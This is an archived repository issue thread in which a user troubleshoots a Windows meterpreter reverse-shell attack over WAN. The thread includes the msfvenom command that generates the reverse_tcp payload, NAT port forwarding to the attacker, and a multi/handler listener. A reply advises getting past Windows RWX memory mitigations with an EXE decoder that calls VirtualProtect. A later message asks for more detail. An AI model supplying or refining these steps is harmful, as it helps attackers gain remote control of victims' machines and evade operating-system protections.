This repository has been archived by the owner on Mar 20, 2023. It is now read-only.
Hello. Was hoping to get some feedback on this- trying to run an attack over WAN:
Attacker:
VB 4.17.0-kali1-amd64 with latest meta apt upgrade.
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=public ip LPORT=4444 -f raw > raw.txt
(build bmp, etc)
*web is running on port 8080
*NAT FWD: TCP on 8080 & 4444 to attacker LAN IP
*The PS batch file handshakes with web server and I see GET 202 etc. But no shell on attacker host.
*using multi/handler meterpreter/reverse_tcp LHOST 0.0.0.0 on 4444
*Running Wireshark on target host I see the 8080 traffic but nothing on 4444. It ...appears... it's downloading on 8080 but the shellcode just isn't running. No error(s).
Handler returns nothing. Any ideas?
Unfortunately, modern Windows versions have put in place some mitigations that prevent the shellcode from running properly. The issue is caused by the fact that the shellcode needs RWX memory, which is flagged when the shellcode is executed. There is an EXE version of the decoder that can be used to set the proper permission using some standard Windows API call to set proper permission (VirtualProtect). This should address the issue.
"There is an EXE version of the decoder that can be used to set the proper permission using some standard Windows API call to set proper permission (VirtualProtect)." - can you put some more details? Where is the EXE file you are talking about? Maybe a small example to clarify?